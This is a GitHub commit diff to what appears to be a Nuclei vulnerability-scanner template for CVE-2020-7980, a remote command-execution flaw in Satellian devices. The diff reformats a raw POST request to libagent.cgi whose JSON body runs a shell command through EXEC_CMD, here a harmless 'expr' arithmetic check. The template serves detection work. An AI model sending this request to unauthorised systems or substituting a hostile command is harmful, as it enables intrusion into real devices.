Update CVE-2020-7980.yaml

patch-1
Ritik Chaddha 2022-04-20 02:46:41 +05:30 committed by GitHub
parent fd6b099f41
commit f532a0ead3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 7 deletions

View File

@ -9,13 +9,14 @@ info:
tags: satellian,rce,cve,cve2020
requests:
- method: POST
path:
- "{{BaseURL}}/cgi-bin/libagent.cgi?type=J"
headers:
Cookie: ctr_t=0; sid=123456789
Content-Type: application/json
body: "{"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "expr 876547689 + 082635241", "F": "EXEC_CMD"}, "V_": 1}"
- raw:
- |
POST /cgi-bin/libagent.cgi?type=J HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Cookie: ctr_t=0; sid=123456789
{"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "expr 876547689 + 082635241", "F": "EXEC_CMD"}, "V_": 1}
redirects: true
max-redirects: 2